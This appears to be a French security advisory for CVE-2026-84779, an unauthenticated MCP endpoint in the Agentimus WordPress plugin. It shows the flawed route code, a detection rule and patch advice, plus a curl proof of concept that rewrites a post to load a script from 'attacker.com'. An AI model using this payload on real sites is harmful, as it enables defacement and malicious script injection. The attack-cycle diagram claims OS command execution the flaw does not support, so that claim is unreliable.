Aller au contenu

CVE-2026-84779 : défaut de contrôle d'accès sur l'API MCP du plugin WordPress agentimus

HERMES

SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE

Cible : Agentimus AI SEO & MCP Plugin (agentimus.endpoints.mcp (REST API & MCP Endpoint Handler))
Confiance : 98%
93 / 100
CRITIQUE

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 19 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
⚖️ Divergence & Justification opérationnelle

Le CVSS v3.1 évalue cette faille à 9.1 (Critique) et le score Hermes Threat Score s'établit à 93 (CRITIQUE). Tout attaquant distant non authentifié peut altérer le contenu des articles, injecter des redirections malveillantes ou modifier les options du site.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-84779: WordPress Agentimus MCP Endpoint Broken Access ControlVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTAgentimus AI SEO & MCP Plugin
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in Agentimus AI SEO & MCP Plugin documented in Hermes dossier.”

Preuves vérifiées associées :

ParamètreSpécification TechniqueContexte de Menace
Identifiant CVECVE-2026-84779Menaces IA Agentique & Protocole MCP
Produit cibléAgentimus AI SEO & MCP PluginAgentimus
Composant affectéagentimus.endpoints.mcp (REST API & MCP Endpoint Handler)Orchestrateur et couche d’outils agentiques
Nature de la failleCWE-306: Missing Authentication for Critical Function / CWE-862: Missing AuthorizationViolation d’intégrité et d’exécution
Versions vulnérablesall versions prior to 1.2.9Environnements en production
Correctif disponible1.2.9Mise à jour impérative

Décomposition du défaut d’autorisation REST API

Section intitulée « Décomposition du défaut d’autorisation REST API »

Dans le fichier d’enregistrement des routes (includes/class-mcp-router.php) :

register_rest_route('agentimus/v1', '/mcp', array(
'methods' => 'POST',
'callback' => array($this, 'handle_mcp_request'),
'permission_callback' => '__return_true', // Faille critique : aucune vérification d'authentification
));

Les méthodes d’outils invoquées exécutaient directement wp_update_post() et update_option() sans exiger de capacité utilisateur (current_user_can).

+----------------------------------------------------------------------------------------------------+
| CYCLE D'ATTAQUE CVE-2026-84779 |
+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt]
│
│ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur
▼
[Agentimus AI SEO & MCP Plugin]
│
├───► 1. Ingestion par agentimus.endpoints.mcp (REST API & MCP Endpoint Handler)
│ - Échec de validation, absence de filtrage ou contournement de sandbox
│
├───► 2. Exécution / Mutation d'état
│ - Exécution de commandes OS ou exfiltration d'identifiants
│
▼
[Infrastructure Cible Compromise]
│
└───► Vol de données, prise de contrôle du serveur ou persistance
+----------------------------------------------------------------------------------------------------+

Fenêtre de terminal
# PoC : Modification non autorisée d'un article WordPress via Agentimus MCP
curl -X POST "https://vulnerable-site.com/wp-json/agentimus/v1/mcp" \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "update_post_content",
"arguments": {
"post_id": 1,
"post_title": "Hacked via Agentimus MCP",
"post_content": "<script src=\"https://attacker.com/malicious_seo.js\"></script>"
}
}
}'

title: WordPress Agentimus MCP Unauthenticated Tool Call
id: 84779c01-e779-4a1b-8f22-agentimus01
status: high
description: Detects HTTP POST requests targeting the Agentimus MCP endpoint without preceding cookie or bearer authentication headers.
author: Hermes Codex Detection Engineering
date: 2026-09-07
logsource:
product: webserver
service: access_log
detection:
selection:
cs-method: 'POST'
cs-uri-stem|contains: '/wp-json/agentimus/v1/mcp'
condition: selection
level: critical

  1. Appliquer les correctifs : mettre à jour Agentimus AI SEO & MCP Plugin vers la version 1.2.9 sans délai.
  2. Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
  3. Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
  4. Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.